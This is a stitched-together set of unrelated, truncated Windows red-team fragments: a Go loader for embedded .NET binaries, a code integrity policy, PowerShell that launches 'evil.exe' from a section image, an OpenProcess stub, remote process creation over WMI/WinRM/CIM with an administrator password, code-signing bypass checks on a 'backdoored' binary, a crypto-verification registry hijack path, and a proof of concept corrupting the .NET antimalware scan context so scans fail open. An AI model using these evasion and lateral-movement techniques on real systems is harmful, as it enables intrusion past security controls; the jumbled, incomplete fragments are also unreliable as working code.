This concept is very much like .jar or .war archives in Java.
NOTE: The built .pyz zipapp can run on both Python 2 & 3, but you can only build .pyz zipapps with Python 3.5 or later.
package main
/*
Example Go program with multiple .NET binaries embedded.
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.17689.0</VersionEx>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<PolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</PolicyID>
<BasePolicyID>{D2BDA982-CCF6-4344-AC5B-0B44427B6816}</BasePolicyID>
<Rules>
<Rule>
<Option>Enabled:Unsigned System Integrity Policy</Option>
</Rule>
$path = "\??\C:\Users\$env:USERNAME\Desktop\bin\evil.exe"
$sect = New-NtSectionImage -Path $path
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
Get-NtStatus $p.ExitStatus
[NtApiDotNet.NtThread]::Create($p, 0, 0, "Suspended", 4096)
Get-NtStatus $p.ExitStatus
$FunctionSig = @"
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
"@
$kernel32 = Add-Type -MemberDefinition $FunctionSig -Name "Process" -Namespace Win32Functions -PassThru
$kernel32::OpenProcess(0x1000, $false, 7520)
# Ensure System.Security assembly is loaded.
Add-Type -AssemblyName System.Security
function ConvertTo-CIPolicy {
<#
.SYNOPSIS
Converts a binary file that contains a Code Integrity policy into XML format.
Author: Matthew Graeber (@mattifestation)
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
#region Attack validations
wmic /node:169.254.37.139 /user:Administrator /password:badpassword process call create notepad.exe
Invoke-WmiMethod -ComputerName 169.254.37.139 -Credential Administrator -Class Win32_Process -Name Create -ArgumentList notepad.exe
$CimSession = New-CimSession -ComputerName 169.254.37.139 -Credential Administrator
Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = 'notepad.exe' }
$CimSession | Remove-CimSession
winrm --% invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -remote:169.254.37.139 -username:Administrator -password:badpassword
$Host.Runspace.LanguageMode
Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe
# Try to execute the script. Add-Type will fail.
Import-Module C:\Demo\bypass_test.psm1
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +
'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
.DESCRIPTION
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the first DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.